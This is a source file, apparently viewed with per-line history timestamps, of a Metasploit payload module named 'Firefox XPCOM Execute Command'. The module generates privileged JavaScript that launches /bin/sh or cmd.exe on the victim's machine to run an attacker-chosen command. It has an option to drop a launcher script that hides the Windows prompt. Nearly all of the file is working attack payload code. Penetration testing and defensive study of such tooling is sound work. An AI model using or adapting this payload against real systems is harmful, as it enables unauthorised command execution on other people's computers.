metasploit-framework/modules/payloads/singles/firefox/exec.rb

71 lines
2.2 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
2016-03-08 13:02:44 +00:00
module MetasploitModule
CachedSize = 1019
include Msf::Payload::Single
include Msf::Payload::Firefox
def initialize(info={})
super(merge_info(info,
2014-01-13 19:57:34 +00:00
'Name' => 'Firefox XPCOM Execute Command',
2014-01-04 14:48:58 +00:00
'Description' => %Q|
2014-01-13 19:57:34 +00:00
This module runs a shell command on the target OS withough touching the disk.
2014-01-04 14:48:58 +00:00
On Windows, this command will flash the command prompt momentarily.
2014-01-13 19:57:34 +00:00
This can be avoided by setting WSCRIPT to true, which drops a jscript
2014-01-04 14:48:58 +00:00
"launcher" to disk that hides the prompt.
|,
'Author' => ['joev'],
'License' => BSD_LICENSE,
'Platform' => 'firefox',
'Arch' => ARCH_FIREFOX
))
register_options([
2014-01-04 14:48:58 +00:00
OptString.new('CMD', [true, "The command string to execute", 'touch /tmp/a.txt']),
OptBool.new('WSCRIPT', [true, "On Windows, drop a vbscript to hide the cmd prompt", false])
], self.class)
end
def generate
<<-EOS
(function(){
window = this;
2014-01-04 14:48:58 +00:00
#{read_file_source if datastore['WSCRIPT']}
#{run_cmd_source if datastore['WSCRIPT']}
2014-01-05 17:24:41 +00:00
var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"]
.getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
var windows = (ua.indexOf("Windows")>-1);
2014-01-04 14:48:58 +00:00
var cmd = (#{JSON.unparse({ :cmd => datastore['CMD'] })}).cmd;
if (#{datastore['WSCRIPT']} && windows) {
2014-01-05 17:24:41 +00:00
runCmd(cmd);
2014-01-04 14:48:58 +00:00
} else {
var process = Components.classes["@mozilla.org/process/util;1"]
.createInstance(Components.interfaces.nsIProcess);
var sh = Components.classes["@mozilla.org/file/local;1"]
.createInstance(Components.interfaces.nsILocalFile);
var args;
if (windows) {
sh.initWithPath("C:\\\\Windows\\\\System32\\\\cmd.exe");
args = ["/c", cmd];
2014-01-05 17:24:41 +00:00
} else {
2014-01-04 14:48:58 +00:00
sh.initWithPath("/bin/sh");
args = ["-c", cmd];
}
process.init(sh);
process.run(true, args, args.length);
}
})();
EOS
end
end